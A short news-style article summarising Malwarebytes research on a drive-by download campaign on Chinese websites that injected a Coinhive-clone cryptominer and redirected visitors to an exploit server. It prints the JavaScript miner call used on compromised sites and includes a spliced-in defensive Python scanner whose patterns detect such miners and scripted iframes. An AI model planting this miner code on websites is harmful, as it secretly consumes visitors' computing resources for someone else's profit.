
In research published by Malwarebytes, the team describes how its investigations occasionally turn up bizarre findings or patterns it has not seen before. This was the case with a particular drive-by download attack planted on Chinese websites.

“For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China,” said Malwarebytes.


The campaign was detected because Malwarebytes researchers observed an abnormal situation: external content embedded in iframes via scripts.


For instance, the researchers found a reference to a Coinhive clone:

var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {
  threads: navigator.hardwareConcurrency,
  autoThreads: false,
  throttle: 0.2,
  forceASMJS: false
});
miner.start();
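The two signals the researchers describe (script-emitted iframes pointing off-site, and a Coinhive-style miner constructor) can be checked for in saved page source. The scanner below is an added example, not code from the report; the HTML it scans is constructed, and the site key and hostnames in it are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed page fragment (not from the report). The miner call mirrors the
# ProjectPoi.User(...) pattern quoted above; key and hosts are placeholders.
SAMPLE_HTML = """
<html><body>
<script>document.write('<iframe src="http://cdn-static.example/ad.html" width=0 height=0></iframe>');</script>
<script src="https://miner-cdn.example/lib/miner.min.js"></script>
<script>
var miner = new ProjectPoi.User('SITEKEY-PLACEHOLDER', 'john-doe', {throttle: 0.2});
miner.start();
</script>
</body></html>
"""

# Body of each <script> block; iframes written from script are the abnormal case.
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(?P<body>.*?)</script>", re.I | re.S)
IFRAME_SRC = re.compile(r"<iframe[^>]+src=[\"']?(?P<src>[^\"'\s>]+)", re.I)
# Coinhive-style instantiation: new <Namespace>.User|Anonymous('<site key>', ...
MINER_CTOR = re.compile(
    r"new\s+(?P<ns>\w+)\.(User|Anonymous)\s*\(\s*['\"](?P<key>[^'\"]+)['\"]", re.I)


def find_scripted_iframes(html, page_host):
    """Return src URLs of iframes emitted from <script> that point off-site."""
    hits = []
    for block in SCRIPT_BLOCK.finditer(html):
        for frame in IFRAME_SRC.finditer(block.group("body")):
            host = urlparse(frame.group("src")).hostname
            if host and host != page_host:
                hits.append(frame.group("src"))
    return hits


def find_miners(html):
    """Return (namespace, site key) pairs for Coinhive-like miner constructors."""
    return [(m.group("ns"), m.group("key")) for m in MINER_CTOR.finditer(html)]


def scan(html, page_host):
    """Combine both indicators into one report for a fetched page."""
    return {"scripted_iframes": find_scripted_iframes(html, page_host),
            "miners": find_miners(html)}


if __name__ == "__main__":
    print(scan(SAMPLE_HTML, "victim-site.example"))
```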


Malwarebytes wrote:

We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.


(Translated from the Chinese:) That is to say, you will receive 90% of the mining revenue. Unlike a mining pool, this revenue is fixed: you receive it whether or not a block is found. We wish to keep 10% to compensate for the loss when no block is found, to keep the servers running, and so on.

I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this rate is fixed, regardless of actual blocks found and the luck involved finding them. We keep 10% for us to operate this service and to (hopefully) turn a profit.


Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:

[Diagram: Flow]


Official report here. Enjoy!